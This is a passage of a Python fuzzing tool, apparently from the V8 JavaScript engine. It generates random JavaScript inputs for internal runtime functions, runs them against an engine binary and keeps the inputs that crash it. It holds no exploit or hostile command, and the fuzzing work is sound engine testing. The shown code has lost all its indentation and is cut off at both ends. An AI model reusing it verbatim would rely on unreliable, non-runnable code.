"InternalNumberParse": [_NUMBER_FORMAT, None, None],
"IsSloppyModeFunction": ["function() {}", None],
"LoadMutableDouble": ["{foo: 1.2}", None, None],
"NewObjectFromBound": ["(function() {}).bind({})", None],
"NumberToRadixString": [None, "2", None],
"ParseJson": ["\"{}\"", 1],
"RegExpExecMultiple": [None, None, "['a']", "['a']", None],
"DefineAccessorProperty": [None, None, "undefined", "undefined", None, None],
"SetIteratorInitialize": [None, None, "2", None],
"SetDebugEventListener": ["undefined", None, None],
"SetFunctionBreakPoint": [None, 200, None, None],
"StringBuilderConcat": ["[1, 2, 3]", 3, None, None],
"StringBuilderJoin": ["['a', 'b']", 4, None, None],
"StringMatch": [None, None, "['a', 'b']", None],
"StringNormalize": [None, 2, None],
"StringReplaceGlobalRegExpWithString": [None, None, None, "['a']", None],
"TypedArrayInitialize": [None, 6, "new ArrayBuffer(8)", None, 4, None],
"TypedArrayInitializeFromArrayLike": [None, 6, None, None, None],
"TypedArraySetFastCases": [None, None, "0", None],
}
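# Hedged helper (illustrative only, not used by the tool): how a
# CUSTOM_KNOWN_GOOD_INPUT entry is interpreted. The last element is the
# expected args.length(); a None entry falls back to the autodetected
# generator for that argument's type.
def _SplitCustomEntry(entry):
  """Returns (per-argument overrides, argslength) for a custom entry."""
  return entry[:-1], entry[-1]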
# Types of arguments that cannot be generated in a JavaScript testcase.
NON_JS_TYPES = [
"Code", "Context", "FixedArray", "FunctionTemplateInfo",
"JSFunctionResultCache", "JSMessageObject", "Map", "ScopeInfo",
"SharedFunctionInfo"]
class Generator(object):
def RandomVariable(self, varname, vartype, simple):
if simple:
return self._Variable(varname, self.GENERATORS[vartype][0])
return self.GENERATORS[vartype][1](self, varname,
self.DEFAULT_RECURSION_BUDGET)
@staticmethod
def IsTypeSupported(typename):
return typename in Generator.GENERATORS
USUAL_SUSPECT_PROPERTIES = ["size", "length", "byteLength", "__proto__",
"prototype", "0", "1", "-1"]
DEFAULT_RECURSION_BUDGET = 2
PROXY_TRAPS = """{
getOwnPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getOwnPropertyNames: function() { return []; },
getPropertyNames: function() { return []; },
defineProperty: function(name, descriptor) {},
delete: function(name) { return true; },
fix: function() {}
}"""
def _Variable(self, name, value, fallback=None):
args = { "name": name, "value": value, "fallback": fallback }
if fallback:
wrapper = "try { %%s } catch(e) { var %(name)s = %(fallback)s; }" % args
else:
wrapper = "%s"
return [wrapper % ("var %(name)s = %(value)s;" % args)]
def _Boolean(self, name, recursion_budget):
return self._Variable(name, random.choice(["true", "false"]))
def _Oddball(self, name, recursion_budget):
return self._Variable(name,
random.choice(["true", "false", "undefined", "null"]))
def _StrictMode(self, name, recursion_budget):
return self._Variable(name, random.choice([0, 1]))
def _Int32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([-3, -1, 0, 1, 2, 10, 515, 0x3fffffff, 0x7fffffff,
0x40000000, -0x40000000, -0x80000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x80000000, 0x7fffffff)
return self._Variable(name, value)
def _Uint32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([0, 1, 2, 3, 4, 8, 0x3fffffff, 0x40000000,
0x7fffffff, 0xffffffff])
elif die < 0.75:
value = random.randint(0, 1000)
else:
value = random.randint(0, 0xffffffff)
return self._Variable(name, value)
def _Smi(self, name, recursion_budget):
die = random.random()
if die < 0.5:
value = random.choice([-5, -1, 0, 1, 2, 3, 0x3fffffff, -0x40000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x40000000, 0x3fffffff)
return self._Variable(name, value)
def _Number(self, name, recursion_budget):
die = random.random()
if die < 0.5:
return self._Smi(name, recursion_budget)
elif die < 0.6:
value = random.choice(["Infinity", "-Infinity", "NaN", "-0",
"1.7976931348623157e+308", # Max value.
"2.2250738585072014e-308", # Min value.
"4.9406564584124654e-324"]) # Min subnormal.
else:
value = random.lognormvariate(0, 15)
return self._Variable(name, value)
def _RawRandomString(self, minlength=0, maxlength=100,
alphabet=string.ascii_letters):
length = random.randint(minlength, maxlength)
result = ""
for i in xrange(length):
result += random.choice(alphabet)
return result
def _SeqString(self, name, recursion_budget):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + 'bar'
return self._Variable(name, "\"%s\" + \"%s\"" % (s1, s2))
def _SeqTwoByteString(self, name, recursion_budget=0):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + unicode + 'bar'
return self._Variable(name, "\"%s\" + \"\\2082\" + \"%s\"" % (s1, s2))
def _SlicedString(self, name):
s = self._RawRandomString(20, 30)
# 'ffoo12345678901234567890'.substr(1)
return self._Variable(name, "\"%s\".substr(1)" % s)
def _ConsString(self, name):
s1 = self._RawRandomString(8, 15)
s2 = self._RawRandomString(8, 15)
# 'foo12345' + (function() { return 'bar12345';})()
return self._Variable(name,
"\"%s\" + (function() { return \"%s\";})()" % (s1, s2))
def _InternalizedString(self, name):
return self._Variable(name, "\"%s\"" % self._RawRandomString(0, 20))
def _String(self, name, recursion_budget):
die = random.random()
if die < 0.5:
string = random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._Variable(name, "\"%s\"" % string)
elif die < 0.6:
number_name = name + "_number"
result = self._Number(number_name, recursion_budget)
return result + self._Variable(name, "\"\" + %s" % number_name)
elif die < 0.7:
return self._SeqString(name, recursion_budget)
elif die < 0.8:
return self._ConsString(name)
elif die < 0.9:
return self._InternalizedString(name)
else:
return self._SlicedString(name)
def _Symbol(self, name, recursion_budget):
raw_string_name = name + "_1"
result = self._String(raw_string_name, recursion_budget)
return result + self._Variable(name, "Symbol(%s)" % raw_string_name)
def _Name(self, name, recursion_budget):
if random.random() < 0.2:
return self._Symbol(name, recursion_budget)
return self._String(name, recursion_budget)
def _JSValue(self, name, recursion_budget):
die = random.random()
raw_name = name + "_1"
if die < 0.33:
result = self._String(raw_name, recursion_budget)
return result + self._Variable(name, "new String(%s)" % raw_name)
elif die < 0.66:
result = self._Boolean(raw_name, recursion_budget)
return result + self._Variable(name, "new Boolean(%s)" % raw_name)
else:
result = self._Number(raw_name, recursion_budget)
return result + self._Variable(name, "new Number(%s)" % raw_name)
def _RawRandomPropertyName(self):
if random.random() < 0.5:
return random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._RawRandomString(0, 10)
def _AddProperties(self, name, result, recursion_budget):
propcount = random.randint(0, 3)
propname = None
for i in range(propcount):
die = random.random()
if die < 0.5:
propname = "%s_prop%d" % (name, i)
result += self._Name(propname, recursion_budget - 1)
else:
propname = "\"%s\"" % self._RawRandomPropertyName()
propvalue_name = "%s_val%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch (e) {}" %
(name, propname, propvalue_name))
if random.random() < 0.2 and propname:
# Force the object to slow mode.
result.append("delete %s[%s];" % (name, propname))
def _RandomElementIndex(self, element_name, result):
if random.random() < 0.5:
return random.randint(-1000, 1000)
result += self._Smi(element_name, 0)
return element_name
def _AddElements(self, name, result, recursion_budget):
elementcount = random.randint(0, 3)
for i in range(elementcount):
element_name = "%s_idx%d" % (name, i)
index = self._RandomElementIndex(element_name, result)
value_name = "%s_elt%d" % (name, i)
result += self._Object(value_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch(e) {}" %
(name, index, value_name))
def _AddAccessors(self, name, result, recursion_budget):
accessorcount = random.randint(0, 3)
for i in range(accessorcount):
propname = self._RawRandomPropertyName()
what = random.choice(["get", "set"])
function_name = "%s_access%d" % (name, i)
result += self._PlainFunction(function_name, recursion_budget - 1)
result.append("try { Object.defineProperty(%s, \"%s\", {%s: %s}); } "
"catch (e) {}" % (name, propname, what, function_name))
def _PlainArray(self, name, recursion_budget):
die = random.random()
if die < 0.5:
literal = random.choice(["[]", "[1, 2]", "[1.5, 2.5]",
"['a', 'b', 1, true]"])
return self._Variable(name, literal)
else:
new = random.choice(["", "new "])
length = random.randint(0, 101000)
return self._Variable(name, "%sArray(%d)" % (new, length))
def _PlainObject(self, name, recursion_budget):
die = random.random()
if die < 0.67:
literal_propcount = random.randint(0, 3)
properties = []
result = []
for i in range(literal_propcount):
propname = self._RawRandomPropertyName()
propvalue_name = "%s_lit%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
properties.append("\"%s\": %s" % (propname, propvalue_name))
return result + self._Variable(name, "{%s}" % ", ".join(properties))
else:
return self._Variable(name, "new Object()")
def _JSArray(self, name, recursion_budget):
result = self._PlainArray(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _RawRandomBufferLength(self):
if random.random() < 0.2:
return random.choice([0, 1, 8, 0x40000000, 0x80000000])
return random.randint(0, 1000)
def _JSArrayBuffer(self, name, recursion_budget):
length = self._RawRandomBufferLength()
return self._Variable(name, "new ArrayBuffer(%d)" % length)
def _JSDataView(self, name, recursion_budget):
buffer_name = name + "_buffer"
result = self._JSArrayBuffer(buffer_name, recursion_budget)
args = [buffer_name]
die = random.random()
if die < 0.67:
offset = self._RawRandomBufferLength()
args.append("%d" % offset)
if die < 0.33:
length = self._RawRandomBufferLength()
args.append("%d" % length)
result += self._Variable(name, "new DataView(%s)" % ", ".join(args),
fallback="new DataView(new ArrayBuffer(8))")
return result
def _JSDate(self, name, recursion_budget):
die = random.random()
if die < 0.25:
return self._Variable(name, "new Date()")
elif die < 0.5:
ms_name = name + "_ms"
result = self._Number(ms_name, recursion_budget)
return result + self._Variable(name, "new Date(%s)" % ms_name)
elif die < 0.75:
str_name = name + "_str"
month = random.choice(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul",
"Aug", "Sep", "Oct", "Nov", "Dec"])
day = random.randint(1, 28)
year = random.randint(1900, 2100)
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
str_value = ("\"%s %s, %s %s:%s:%s\"" %
(month, day, year, hour, minute, second))
result = self._Variable(str_name, str_value)
return result + self._Variable(name, "new Date(%s)" % str_name)
else:
components = tuple(map(lambda x: "%s_%s" % (name, x),
["y", "m", "d", "h", "min", "s", "ms"]))
return ([j for i in map(self._Int32, components) for j in i] +
self._Variable(name, "new Date(%s)" % ", ".join(components)))
def _PlainFunction(self, name, recursion_budget):
result_name = "result"
body = ["function() {"]
body += self._Object(result_name, recursion_budget - 1)
body.append("return result;\n}")
return self._Variable(name, "%s" % "\n".join(body))
def _JSFunction(self, name, recursion_budget):
result = self._PlainFunction(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSFunctionProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.createFunction(%s, function() {})" %
self.PROXY_TRAPS)
def _JSGeneratorObject(self, name, recursion_budget):
# TODO(jkummerow): Be more creative here?
return self._Variable(name, "(function*() { yield 1; })()")
def _JSMap(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sMap()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
key_name = "%s_k%d" % (name, i)
value_name = "%s_v%d" % (name, i)
if weak:
result += self._JSObject(key_name, recursion_budget - 1)
else:
result += self._Object(key_name, recursion_budget - 1)
result += self._Object(value_name, recursion_budget - 1)
result.append("%s.set(%s, %s)" % (name, key_name, value_name))
return result
def _JSMapIterator(self, name, recursion_budget):
map_name = name + "_map"
result = self._JSMap(map_name, recursion_budget)
iterator_type = random.choice(['keys', 'values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(map_name, iterator_type)))
def _JSProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.create(%s)" % self.PROXY_TRAPS)
def _JSRegExp(self, name, recursion_budget):
flags = random.choice(["", "g", "i", "m", "gi"])
string = "a(b|c)*a" # TODO(jkummerow): Be more creative here?
ctor = random.choice(["/%s/%s", "new RegExp(\"%s\", \"%s\")"])
return self._Variable(name, ctor % (string, flags))
def _JSSet(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sSet()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
element_name = "%s_e%d" % (name, i)
if weak:
result += self._JSObject(element_name, recursion_budget - 1)
else:
result += self._Object(element_name, recursion_budget - 1)
result.append("%s.add(%s)" % (name, element_name))
return result
def _JSSetIterator(self, name, recursion_budget):
set_name = name + "_set"
result = self._JSSet(set_name, recursion_budget)
iterator_type = random.choice(['values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(set_name, iterator_type)))
def _JSTypedArray(self, name, recursion_budget):
arraytype = random.choice(["Int8", "Int16", "Int32", "Uint8", "Uint16",
"Uint32", "Float32", "Float64", "Uint8Clamped"])
ctor_type = random.randint(0, 3)
if ctor_type == 0:
length = random.randint(0, 1000)
return self._Variable(name, "new %sArray(%d)" % (arraytype, length),
fallback="new %sArray(8)" % arraytype)
elif ctor_type == 1:
input_name = name + "_typedarray"
result = self._JSTypedArray(input_name, recursion_budget - 1)
return (result +
self._Variable(name, "new %sArray(%s)" % (arraytype, input_name),
fallback="new %sArray(8)" % arraytype))
elif ctor_type == 2:
arraylike_name = name + "_arraylike"
result = self._JSObject(arraylike_name, recursion_budget - 1)
length = random.randint(0, 1000)
result.append("try { %s.length = %d; } catch(e) {}" %
(arraylike_name, length))
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, arraylike_name),
fallback="new %sArray(8)" % arraytype))
else:
die = random.random()
buffer_name = name + "_buffer"
args = [buffer_name]
result = self._JSArrayBuffer(buffer_name, recursion_budget)
if die < 0.67:
offset_name = name + "_offset"
args.append(offset_name)
result += self._Int32(offset_name)
if die < 0.33:
length_name = name + "_length"
args.append(length_name)
result += self._Int32(length_name)
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, ", ".join(args)),
fallback="new %sArray(8)" % arraytype))
def _JSArrayBufferView(self, name, recursion_budget):
if random.random() < 0.4:
return self._JSDataView(name, recursion_budget)
else:
return self._JSTypedArray(name, recursion_budget)
def _JSWeakCollection(self, name, recursion_budget):
ctor = random.choice([self._JSMap, self._JSSet])
return ctor(name, recursion_budget, weak="Weak")
def _PropertyDetails(self, name, recursion_budget):
# TODO(jkummerow): Be more clever here?
return self._Int32(name)
def _JSObject(self, name, recursion_budget):
die = random.random()
if die < 0.4:
function = random.choice([self._PlainObject, self._PlainArray,
self._PlainFunction])
elif die < 0.5:
return self._Variable(name, "this") # Global object.
else:
function = random.choice([self._JSArrayBuffer, self._JSDataView,
self._JSDate, self._JSFunctionProxy,
self._JSGeneratorObject, self._JSMap,
self._JSMapIterator, self._JSRegExp,
self._JSSet, self._JSSetIterator,
self._JSTypedArray, self._JSValue,
self._JSWeakCollection])
result = function(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSReceiver(self, name, recursion_budget):
if random.random() < 0.9: return self._JSObject(name, recursion_budget)
return self._JSProxy(name, recursion_budget)
def _HeapObject(self, name, recursion_budget):
die = random.random()
if die < 0.9: return self._JSReceiver(name, recursion_budget)
elif die < 0.95: return self._Oddball(name, recursion_budget)
else: return self._Name(name, recursion_budget)
def _Object(self, name, recursion_budget):
if recursion_budget <= 0:
function = random.choice([self._Oddball, self._Number, self._Name,
self._JSValue, self._JSRegExp])
return function(name, recursion_budget)
if random.random() < 0.2:
return self._Smi(name, recursion_budget)
return self._HeapObject(name, recursion_budget)
GENERATORS = {
"Boolean": ["true", _Boolean],
"HeapObject": ["new Object()", _HeapObject],
"Int32": ["32", _Int32],
"JSArray": ["new Array()", _JSArray],
"JSArrayBuffer": ["new ArrayBuffer(8)", _JSArrayBuffer],
"JSArrayBufferView": ["new Int32Array(2)", _JSArrayBufferView],
"JSDataView": ["new DataView(new ArrayBuffer(24))", _JSDataView],
"JSDate": ["new Date()", _JSDate],
"JSFunction": ["function() {}", _JSFunction],
"JSFunctionProxy": ["Proxy.createFunction({}, function() {})",
_JSFunctionProxy],
"JSGeneratorObject": ["(function*(){ yield 1; })()", _JSGeneratorObject],
"JSMap": ["new Map()", _JSMap],
"JSMapIterator": ["new Map().entries()", _JSMapIterator],
"JSObject": ["new Object()", _JSObject],
"JSProxy": ["Proxy.create({})", _JSProxy],
"JSReceiver": ["new Object()", _JSReceiver],
"JSRegExp": ["/ab/g", _JSRegExp],
"JSSet": ["new Set()", _JSSet],
"JSSetIterator": ["new Set().values()", _JSSetIterator],
"JSTypedArray": ["new Int32Array(2)", _JSTypedArray],
"JSValue": ["new String('foo')", _JSValue],
"JSWeakCollection": ["new WeakMap()", _JSWeakCollection],
"Name": ["\"name\"", _Name],
"Number": ["1.5", _Number],
"Object": ["new Object()", _Object],
"PropertyDetails": ["513", _PropertyDetails],
"SeqOneByteString": ["\"seq 1-byte\"", _SeqString],
"SeqString": ["\"seqstring\"", _SeqString],
"SeqTwoByteString": ["\"seq \\u2082-byte\"", _SeqTwoByteString],
"Smi": ["1", _Smi],
"StrictMode": ["1", _StrictMode],
"String": ["\"foo\"", _String],
"Symbol": ["Symbol(\"symbol\")", _Symbol],
"Uint32": ["32", _Uint32],
}
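# Hedged usage sketch (not part of the tool): GENERATORS maps a C++ argument
# type name to [canned JS literal, recursive generator]. RandomVariable with
# simple=True emits the canned literal, while simple=False runs the generator
# with DEFAULT_RECURSION_BUDGET, e.g.:
#
#   gen = Generator()
#   gen.RandomVariable("_x", "Smi", simple=True)       # -> ['var _x = 1;']
#   gen.RandomVariable("_y", "JSArray", simple=False)  # randomized definitions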
class ArgParser(object):
def __init__(self, regex, ctor):
self.regex = regex
self.ArgCtor = ctor
class Arg(object):
def __init__(self, typename, varname, index):
self.type = typename
self.name = "_%s" % varname
self.index = index
class Function(object):
def __init__(self, match):
self.name = match.group(1)
self.argslength = -1
self.args = {}
self.inline = ""
handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_HANDLE_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
plain_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
number_handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_NUMBER_ARG_HANDLE_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
smi_arg_parser = ArgParser(
re.compile("^\s*CONVERT_SMI_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Smi", match.group(1), int(match.group(2))))
double_arg_parser = ArgParser(
re.compile("^\s*CONVERT_DOUBLE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
number_arg_parser = ArgParser(
re.compile(
"^\s*CONVERT_NUMBER_CHECKED\(\w+, (\w+), (\w+), args\[(\d+)\]\)"),
lambda match: Arg(match.group(2), match.group(1), int(match.group(3))))
strict_mode_arg_parser = ArgParser(
re.compile("^\s*CONVERT_STRICT_MODE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("StrictMode", match.group(1), int(match.group(2))))
boolean_arg_parser = ArgParser(
re.compile("^\s*CONVERT_BOOLEAN_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Boolean", match.group(1), int(match.group(2))))
property_details_parser = ArgParser(
re.compile("^\s*CONVERT_PROPERTY_DETAILS_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("PropertyDetails", match.group(1), int(match.group(2))))
arg_parsers = [handle_arg_parser, plain_arg_parser, number_handle_arg_parser,
smi_arg_parser,
double_arg_parser, number_arg_parser, strict_mode_arg_parser,
boolean_arg_parser, property_details_parser]
def SetArgsLength(self, match):
self.argslength = int(match.group(1))
def TryParseArg(self, line):
for parser in Function.arg_parsers:
match = parser.regex.match(line)
if match:
arg = parser.ArgCtor(match)
self.args[arg.index] = arg
return True
return False
def Filename(self):
return "%s.js" % self.name.lower()
def __str__(self):
s = [self.name, "("]
argcount = self.argslength
if argcount < 0:
print("WARNING: unknown argslength for function %s" % self.name)
if self.args:
argcount = max([self.args[i].index + 1 for i in self.args])
else:
argcount = 0
for i in range(argcount):
if i > 0: s.append(", ")
s.append(self.args[i].type if i in self.args else "<unknown>")
s.append(")")
return "".join(s)
class Macro(object):
def __init__(self, match):
self.name = match.group(1)
self.args = [s.strip() for s in match.group(2).split(",")]
self.lines = []
self.indentation = 0
self.AddLine(match.group(3))
def AddLine(self, line):
if not line: return
if not self.lines:
# This is the first line, detect indentation.
self.indentation = len(line) - len(line.lstrip())
line = line.rstrip("\\\n ")
if not line: return
assert len(line[:self.indentation].strip()) == 0, \
("expected whitespace: '%s', full line: '%s'" %
(line[:self.indentation], line))
line = line[self.indentation:]
if not line: return
self.lines.append(line + "\n")
def Finalize(self):
for arg in self.args:
pattern = re.compile(r"(##|\b)%s(##|\b)" % arg)
for i in range(len(self.lines)):
self.lines[i] = re.sub(pattern, "%%(%s)s" % arg, self.lines[i])
def FillIn(self, arg_values):
filler = {}
assert len(arg_values) == len(self.args)
for i in range(len(self.args)):
filler[self.args[i]] = arg_values[i]
result = []
for line in self.lines:
result.append(line % filler)
return result
# Parses HEADERFILENAME to find out which runtime functions are "inline".
def FindInlineRuntimeFunctions():
inline_functions = []
with open(HEADERFILENAME, "r") as f:
inline_list = "#define INLINE_FUNCTION_LIST(F) \\\n"
inline_function = re.compile(r"^\s*F\((\w+), \d+, \d+\)\s*\\?")
mode = "SEARCHING"
for line in f:
if mode == "ACTIVE":
match = inline_function.match(line)
if match:
inline_functions.append(match.group(1))
if not line.endswith("\\\n"):
mode = "SEARCHING"
elif mode == "SEARCHING":
if line == inline_list:
mode = "ACTIVE"
return inline_functions
def ReadFileAndExpandMacros(filename):
found_macros = {}
expanded_lines = []
with open(filename, "r") as f:
found_macro = None
for line in f:
if found_macro is not None:
found_macro.AddLine(line)
if not line.endswith("\\\n"):
found_macro.Finalize()
found_macro = None
continue
match = MACRO.match(line)
if match:
found_macro = Macro(match)
if found_macro.name in EXPAND_MACROS:
found_macros[found_macro.name] = found_macro
else:
found_macro = None
continue
match = FIRST_WORD.match(line)
if match:
first_word = match.group(1)
if first_word in found_macros:
MACRO_CALL = re.compile("%s\(([^)]*)\)" % first_word)
match = MACRO_CALL.match(line)
assert match
args = [s.strip() for s in match.group(1).split(",")]
expanded_lines += found_macros[first_word].FillIn(args)
continue
expanded_lines.append(line)
return expanded_lines
# Detects runtime functions by parsing FILENAME.
def FindRuntimeFunctions():
inline_functions = FindInlineRuntimeFunctions()
functions = []
expanded_lines = ReadFileAndExpandMacros(FILENAME)
function = None
partial_line = ""
for line in expanded_lines:
# Multi-line definition support, ignoring macros.
if line.startswith("RUNTIME_FUNCTION") and not line.endswith("{\n"):
if line.endswith("\\\n"): continue
partial_line = line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if partial_line.endswith("{"):
line = partial_line
partial_line = ""
else:
continue
match = FUNCTION.match(line)
if match:
function = Function(match)
if function.name in inline_functions:
function.inline = "_"
continue
if function is None: continue
match = ARGSLENGTH.match(line)
if match:
function.SetArgsLength(match)
continue
if function.TryParseArg(line):
continue
if line == FUNCTIONEND:
if function is not None:
functions.append(function)
function = None
return functions
# Hack: This must have the same fields as class Function above, because the
# two are used polymorphically in RunFuzzer(). We could use inheritance...
class Builtin(object):
def __init__(self, match):
self.name = match.group(1)
args = match.group(2)
self.argslength = 0 if args == "" else args.count(",") + 1
self.inline = ""
self.args = {}
if self.argslength > 0:
args = args.split(",")
for i in range(len(args)):
# a = args[i].strip() # TODO: filter out /* comments */ first.
a = ""
self.args[i] = Arg("Object", a, i)
def __str__(self):
return "%s(%d)" % (self.name, self.argslength)
def FindJSBuiltins():
PATH = "src"
fileslist = []
for (root, dirs, files) in os.walk(PATH):
for f in files:
if f.endswith(".js"):
fileslist.append(os.path.join(root, f))
builtins = []
regexp = re.compile("^function (\w+)\s*\((.*?)\) {")
matches = 0
for filename in fileslist:
with open(filename, "r") as f:
file_contents = f.read()
file_contents = js2c.ExpandInlineMacros(file_contents)
lines = file_contents.split("\n")
partial_line = ""
for line in lines:
if line.startswith("function") and not '{' in line:
partial_line += line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if '{' in line:
line = partial_line
partial_line = ""
else:
continue
match = regexp.match(line)
if match:
builtins.append(Builtin(match))
return builtins
# Classifies runtime functions.
def ClassifyFunctions(functions):
# Can be fuzzed with a JavaScript testcase.
js_fuzzable_functions = []
# We have enough information to fuzz these, but they need inputs that
# cannot be created or passed around in JavaScript.
cctest_fuzzable_functions = []
# This script does not have enough information about these.
unknown_functions = []
types = {}
for f in functions:
if f.name in BLACKLISTED:
continue
decision = js_fuzzable_functions
custom = CUSTOM_KNOWN_GOOD_INPUT.get(f.name, None)
if f.argslength < 0:
# Unknown length -> give up unless there's a custom definition.
if custom and custom[-1] is not None:
f.argslength = custom[-1]
assert len(custom) == f.argslength + 1, \
("%s: last custom definition must be argslength" % f.name)
else:
decision = unknown_functions
else:
if custom:
# Any custom definitions must match the known argslength.
assert len(custom) == f.argslength + 1, \
("%s should have %d custom definitions but has %d" %
(f.name, f.argslength + 1, len(custom)))
for i in range(f.argslength):
if custom and custom[i] is not None:
# All good, there's a custom definition.
pass
elif not i in f.args:
# No custom definition and no parse result -> give up.
decision = unknown_functions
else:
t = f.args[i].type
if t in NON_JS_TYPES:
decision = cctest_fuzzable_functions
else:
assert Generator.IsTypeSupported(t), \
("type generator not found for %s, function: %s" % (t, f))
decision.append(f)
return (js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions)
def _GetKnownGoodArgs(function, generator):
custom_input = CUSTOM_KNOWN_GOOD_INPUT.get(function.name, None)
definitions = []
argslist = []
for i in range(function.argslength):
if custom_input and custom_input[i] is not None:
name = "arg%d" % i
definitions.append("var %s = %s;" % (name, custom_input[i]))
else:
arg = function.args[i]
name = arg.name
definitions += generator.RandomVariable(name, arg.type, simple=True)
argslist.append(name)
return (definitions, argslist)
def _GenerateTestcase(function, definitions, argslist, throws):
s = ["// Copyright 2014 the V8 project authors. All rights reserved.",
"// AUTO-GENERATED BY tools/generate-runtime-tests.py, DO NOT MODIFY",
"// Flags: --allow-natives-syntax --harmony"] + definitions
call = "%%%s%s(%s);" % (function.inline, function.name, ", ".join(argslist))
if throws:
s.append("try {")
s.append(call)
s.append("} catch(e) {}")
else:
s.append(call)
testcase = "\n".join(s)
return testcase
def GenerateJSTestcaseForFunction(function):
gen = Generator()
(definitions, argslist) = _GetKnownGoodArgs(function, gen)
testcase = _GenerateTestcase(function, definitions, argslist,
function.name in THROWS)
path = os.path.join(BASEPATH, function.Filename())
with open(path, "w") as f:
f.write("%s\n" % testcase)
def GenerateTestcases(functions):
shutil.rmtree(BASEPATH) # Re-generate everything.
os.makedirs(BASEPATH)
for f in functions:
GenerateJSTestcaseForFunction(f)
def _SaveFileName(save_path, process_id, save_file_index):
return "%s/fuzz_%d_%d.js" % (save_path, process_id, save_file_index)
def _GetFuzzableRuntimeFunctions():
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
return js_fuzzable_functions
FUZZ_TARGET_LISTS = {
"runtime": _GetFuzzableRuntimeFunctions,
"builtins": FindJSBuiltins,
}
def RunFuzzer(process_id, options, stop_running):
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.001
SLEEP_TIME_FACTOR = 1.25
base_file_name = "/dev/shm/runtime_fuzz_%d" % process_id
test_file_name = "%s.js" % base_file_name
stderr_file_name = "%s.out" % base_file_name
save_file_index = 0
while os.path.exists(_SaveFileName(options.save_path, process_id,
save_file_index)):
save_file_index += 1
targets = FUZZ_TARGET_LISTS[options.fuzz_target]()
try:
for i in range(options.num_tests):
if stop_running.is_set(): break
function = None
while function is None or function.argslength == 0:
function = random.choice(targets)
args = []
definitions = []
gen = Generator()
for i in range(function.argslength):
arg = function.args[i]
argname = "arg%d%s" % (i, arg.name)
args.append(argname)
definitions += gen.RandomVariable(argname, arg.type, simple=False)
testcase = _GenerateTestcase(function, definitions, args, True)
with open(test_file_name, "w") as f:
f.write("%s\n" % testcase)
with open("/dev/null", "w") as devnull:
with open(stderr_file_name, "w") as stderr:
process = subprocess.Popen(
[options.binary, "--allow-natives-syntax", "--harmony",
"--enable-slow-asserts", test_file_name],
stdout=devnull, stderr=stderr)
end_time = time.time() + options.timeout
timed_out = False
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
os.kill(process.pid, signal.SIGTERM)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
if exit_code != 0 and not timed_out:
oom = False
with open(stderr_file_name, "r") as stderr:
for line in stderr:
if line.strip() == "# Allocation failed - process out of memory":
oom = True
break
if oom: continue
save_name = _SaveFileName(options.save_path, process_id,
save_file_index)
shutil.copyfile(test_file_name, save_name)
save_file_index += 1
except KeyboardInterrupt:
stop_running.set()
finally:
if os.path.exists(test_file_name):
os.remove(test_file_name)
if os.path.exists(stderr_file_name):
